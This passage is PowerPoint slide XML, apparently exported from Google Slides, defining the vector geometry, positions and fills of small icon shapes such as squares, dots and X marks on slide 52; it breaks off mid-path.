            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7466503" y="2870362"/>
              <a:ext cx="187237" cy="187257"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="9496" h="9497" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="0" y="1"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="9496"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9496" y="9496"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9496" y="1"/>
                  </a:ln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66" name="Google Shape;1378;p52">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{31DEF788-5550-8249-611F-1FDE3D87A86B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7507456" y="2912222"/>
              <a:ext cx="105331" cy="103537"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="5342" h="5251" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="5022" y="1"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="4948" y="1"/>
                    <a:pt x="4874" y="23"/>
                    <a:pt x="4817" y="69"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="115" y="4771"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="4885"/>
                    <a:pt x="1" y="5068"/>
                    <a:pt x="115" y="5182"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="183" y="5228"/>
                    <a:pt x="252" y="5250"/>
                    <a:pt x="320" y="5250"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="389" y="5250"/>
                    <a:pt x="480" y="5228"/>
                    <a:pt x="526" y="5182"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="5228" y="480"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="5342" y="366"/>
                    <a:pt x="5342" y="183"/>
                    <a:pt x="5228" y="69"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5170" y="23"/>
                    <a:pt x="5096" y="1"/>
                    <a:pt x="5022"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67" name="Google Shape;1379;p52">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{15C0772E-AD2F-C39D-705A-6CDDC27E6D90}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7721687" y="2870362"/>
              <a:ext cx="187237" cy="187257"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="9496" h="9497" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="0" y="1"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="9496"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9496" y="9496"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9496" y="1"/>
                  </a:ln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68" name="Google Shape;1380;p52">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7D2EF834-33DC-3E6A-D892-63D1B23E90FB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7772085" y="2916284"/>
              <a:ext cx="94979" cy="95413"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="4817" h="4839" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="4246" y="571"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4246" y="4268"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="571" y="4268"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="571" y="571"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="275" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="115" y="0"/>
                    <a:pt x="1" y="137"/>
                    <a:pt x="1" y="297"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1" y="4542"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="4702"/>
                    <a:pt x="115" y="4839"/>
                    <a:pt x="275" y="4839"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="4543" y="4839"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="4680" y="4839"/>
                    <a:pt x="4817" y="4702"/>
                    <a:pt x="4817" y="4542"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="4817" y="297"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="4817" y="137"/>
                    <a:pt x="4680" y="0"/>
                    <a:pt x="4543"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69" name="Google Shape;1381;p52">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{251120C0-B32C-577B-171C-41B526148F0D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7976872" y="2870362"/>
              <a:ext cx="186784" cy="187257"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="9473" h="9497" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="0" y="1"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="9496"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9473" y="9496"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9473" y="1"/>
                  </a:ln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70" name="Google Shape;1382;p52">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{25CA7065-3A03-701A-5C48-8F5C6008F23E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8022774" y="2916383"/>
              <a:ext cx="11278" cy="11160"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="572" h="566" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="286" y="1"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="252" y="1"/>
                    <a:pt x="217" y="6"/>
                    <a:pt x="183" y="18"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="137" y="41"/>
                    <a:pt x="115" y="64"/>
                    <a:pt x="92" y="86"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="23" y="132"/>
                    <a:pt x="1" y="223"/>
                    <a:pt x="1" y="292"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="337"/>
                    <a:pt x="1" y="360"/>
                    <a:pt x="23" y="406"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="46" y="429"/>
                    <a:pt x="69" y="452"/>
                    <a:pt x="92" y="497"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="137" y="543"/>
                    <a:pt x="206" y="566"/>
                    <a:pt x="297" y="566"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="366" y="566"/>
                    <a:pt x="434" y="543"/>
                    <a:pt x="480" y="497"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="548" y="429"/>
                    <a:pt x="571" y="360"/>
                    <a:pt x="571" y="292"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="571" y="246"/>
                    <a:pt x="571" y="223"/>
                    <a:pt x="548" y="178"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="526" y="132"/>
                    <a:pt x="526" y="109"/>
                    <a:pt x="480" y="86"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="457" y="64"/>
                    <a:pt x="434" y="41"/>
                    <a:pt x="389" y="18"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="354" y="6"/>
                    <a:pt x="320" y="1"/>
                    <a:pt x="286"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71" name="Google Shape;1383;p52">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1730DCD0-C96D-9098-91CF-61894F724744}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8106495" y="2916383"/>
              <a:ext cx="11259" cy="11160"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="571" h="566" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="297" y="1"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="257" y="1"/>
                    <a:pt x="217" y="6"/>
                    <a:pt x="183" y="18"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="160" y="41"/>
                    <a:pt x="114" y="64"/>
                    <a:pt x="91" y="86"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="46" y="132"/>
                    <a:pt x="0" y="223"/>
                    <a:pt x="0" y="292"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="337"/>
                    <a:pt x="23" y="360"/>
                    <a:pt x="23" y="406"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="46" y="429"/>
                    <a:pt x="69" y="452"/>
                    <a:pt x="91" y="497"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="137" y="543"/>
                    <a:pt x="228" y="566"/>
                    <a:pt x="297" y="566"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="365" y="566"/>
                    <a:pt x="434" y="543"/>
                    <a:pt x="502" y="497"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="548" y="429"/>
                    <a:pt x="571" y="360"/>
                    <a:pt x="571" y="292"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="571" y="246"/>
                    <a:pt x="571" y="223"/>
                    <a:pt x="548" y="178"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="548" y="132"/>
                    <a:pt x="525" y="109"/>
                    <a:pt x="502" y="86"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="479" y="64"/>
                    <a:pt x="434" y="41"/>
                    <a:pt x="411" y="18"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="377" y="6"/>
                    <a:pt x="337" y="1"/>
                    <a:pt x="297"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16" name="Google Shape;1384;p52">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8A0DE14E-9B13-B6D9-94C3-409B639B7805}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8022774" y="3000202"/>
              <a:ext cx="11278" cy="11495"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="572" h="583" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="286" y="1"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="252" y="1"/>
                    <a:pt x="217" y="12"/>
                    <a:pt x="183" y="35"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="137" y="35"/>
                    <a:pt x="115" y="58"/>
                    <a:pt x="92" y="81"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="23" y="149"/>
                    <a:pt x="1" y="218"/>
                    <a:pt x="1" y="286"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="332"/>
                    <a:pt x="1" y="355"/>
                    <a:pt x="23" y="400"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="46" y="446"/>
                    <a:pt x="46" y="469"/>
                    <a:pt x="92" y="492"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="115" y="515"/>
                    <a:pt x="137" y="537"/>
                    <a:pt x="183" y="560"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="206" y="560"/>
                    <a:pt x="252" y="583"/>
                    <a:pt x="297" y="583"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="320" y="583"/>
                    <a:pt x="366" y="560"/>
                    <a:pt x="389" y="560"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="434" y="537"/>
                    <a:pt x="457" y="515"/>
                    <a:pt x="480" y="492"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="526" y="469"/>
                    <a:pt x="526" y="446"/>
                    <a:pt x="548" y="400"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="571" y="355"/>
                    <a:pt x="571" y="332"/>
                    <a:pt x="571" y="286"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="571" y="218"/>
                    <a:pt x="548" y="149"/>
                    <a:pt x="480" y="81"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="457" y="58"/>
                    <a:pt x="434" y="35"/>
                    <a:pt x="389" y="35"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="354" y="12"/>
                    <a:pt x="320" y="1"/>
                    <a:pt x="286"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17" name="Google Shape;1385;p52">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{83112E41-3CF4-F2B8-F2ED-3DDCA8335748}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8106495" y="3000419"/>
              <a:ext cx="11259" cy="11278"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="571" h="572" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="303" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="263" y="0"/>
                    <a:pt x="223" y="8"/>
                    <a:pt x="183" y="24"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="160" y="24"/>
                    <a:pt x="114" y="47"/>
                    <a:pt x="91" y="70"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="46" y="138"/>
                    <a:pt x="0" y="207"/>
                    <a:pt x="0" y="275"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="321"/>
                    <a:pt x="23" y="344"/>
                    <a:pt x="23" y="389"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="46" y="435"/>
                    <a:pt x="69" y="458"/>
                    <a:pt x="91" y="481"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="114" y="504"/>
                    <a:pt x="160" y="526"/>
                    <a:pt x="183" y="549"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="228" y="549"/>
                    <a:pt x="251" y="572"/>
                    <a:pt x="297" y="572"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="365" y="572"/>
                    <a:pt x="434" y="526"/>
                    <a:pt x="502" y="481"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="525" y="458"/>
                    <a:pt x="548" y="435"/>
                    <a:pt x="548" y="389"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="571" y="344"/>
                    <a:pt x="571" y="321"/>
                    <a:pt x="571" y="275"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="571" y="207"/>
                    <a:pt x="548" y="138"/>
                    <a:pt x="502" y="70"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="443" y="26"/>
                    <a:pt x="375" y="0"/>
                    <a:pt x="303"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18" name="Google Shape;1386;p52">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5E193F2E-F27A-4F76-6E86-102E438A9694}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8417479" y="1683566"/>
              <a:ext cx="831724" cy="832177"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="42182" h="42205" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="2739" y="1"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1210" y="1"/>
                    <a:pt x="0" y="1233"/>
                    <a:pt x="0" y="2740"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="39466"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="40972"/>
                    <a:pt x="1210" y="42205"/>
                    <a:pt x="2739" y="42205"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="39442" y="42205"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="40949" y="42205"/>
                    <a:pt x="42181" y="40972"/>
                    <a:pt x="42181" y="39466"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="42181" y="2740"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="42181" y="1233"/>
                    <a:pt x="40949" y="1"/>
                    <a:pt x="39442" y="1"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="2970AA">
                <a:alpha val="3482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19" name="Google Shape;1387;p52">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1291D10C-BD74-C6EA-1EC9-9FFCD4667456}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8364814" y="1630920"/>
              <a:ext cx="831724" cy="832157"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="42182" h="42204" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="2740" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1233" y="0"/>
                    <a:pt x="1" y="1233"/>
                    <a:pt x="1" y="2739"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1" y="39465"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="40971"/>
                    <a:pt x="1233" y="42204"/>
                    <a:pt x="2740" y="42204"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="39443" y="42204"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="40972" y="42204"/>
                    <a:pt x="42182" y="40971"/>
                    <a:pt x="42182" y="39465"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="42182" y="2739"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="42182" y="1233"/>
                    <a:pt x="40972" y="0"/>
                    <a:pt x="39443" y="0"/>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20" name="Google Shape;1388;p52">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BDD6BA8C-816C-08F3-7CBA-F204F57185F3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8359411" y="1625518"/>
              <a:ext cx="842982" cy="842963"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="42753" h="42752" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="39717" y="571"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="41086" y="571"/>
                    <a:pt x="42182" y="1666"/>
                    <a:pt x="42182" y="3013"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="42182" y="39739"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="42182" y="41086"/>
                    <a:pt x="41086" y="42181"/>
                    <a:pt x="39717" y="42181"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="3014" y="42181"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1667" y="42181"/>
                    <a:pt x="571" y="41086"/>
                    <a:pt x="571" y="39739"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="571" y="3013"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="571" y="1666"/>
                    <a:pt x="1667" y="571"/>
                    <a:pt x="3014" y="571"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="3014" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1348" y="0"/>
                    <a:pt x="1" y="1347"/>
                    <a:pt x="1" y="3013"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1" y="39739"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="41405"/>
                    <a:pt x="1348" y="42752"/>
                    <a:pt x="3014" y="42752"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="39717" y="42752"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="41383" y="42752"/>
                    <a:pt x="42753" y="41405"/>
                    <a:pt x="42753" y="39739"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="42753" y="3013"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="42753" y="1347"/>
                    <a:pt x="41383" y="0"/>
                    <a:pt x="39717"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21" name="Google Shape;1389;p52">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9FF6C6AC-EBC0-4D03-5D13-750F963ED412}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8428718" y="1690329"/>
              <a:ext cx="54933" cy="54026"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2786" h="2740" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="2466" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2392" y="0"/>
                    <a:pt x="2318" y="23"/>
                    <a:pt x="2261" y="69"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="115" y="2237"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="2351"/>
                    <a:pt x="1" y="2534"/>
                    <a:pt x="115" y="2648"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="161" y="2693"/>
                    <a:pt x="229" y="2739"/>
                    <a:pt x="321" y="2739"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="389" y="2739"/>
                    <a:pt x="457" y="2693"/>
                    <a:pt x="503" y="2648"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="2672" y="479"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2786" y="365"/>
                    <a:pt x="2786" y="183"/>
                    <a:pt x="2672" y="69"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2614" y="23"/>
                    <a:pt x="2540" y="0"/>
                    <a:pt x="2466"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22" name="Google Shape;1390;p52">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3AB2D933-FE52-AFED-1BF2-691CB89D3E6F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8428718" y="1690329"/>
              <a:ext cx="54933" cy="54026"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2786" h="2740" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="318" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="246" y="0"/>
                    <a:pt x="172" y="23"/>
                    <a:pt x="115" y="69"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="183"/>
                    <a:pt x="1" y="365"/>
                    <a:pt x="115" y="479"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="2283" y="2648"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2329" y="2693"/>
                    <a:pt x="2398" y="2739"/>
                    <a:pt x="2466" y="2739"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2557" y="2739"/>
                    <a:pt x="2626" y="2693"/>
                    <a:pt x="2672" y="2648"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2786" y="2534"/>
                    <a:pt x="2786" y="2351"/>
                    <a:pt x="2672" y="2237"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="503" y="69"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="457" y="23"/>
                    <a:pt x="389" y="0"/>
                    <a:pt x="318"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23" name="Google Shape;1391;p52">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F24CDE58-C618-8CF5-3000-461715B0163E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8179844" y="1858638"/>
              <a:ext cx="246646" cy="107579"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="12509" h="5456" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="274" y="1"/>
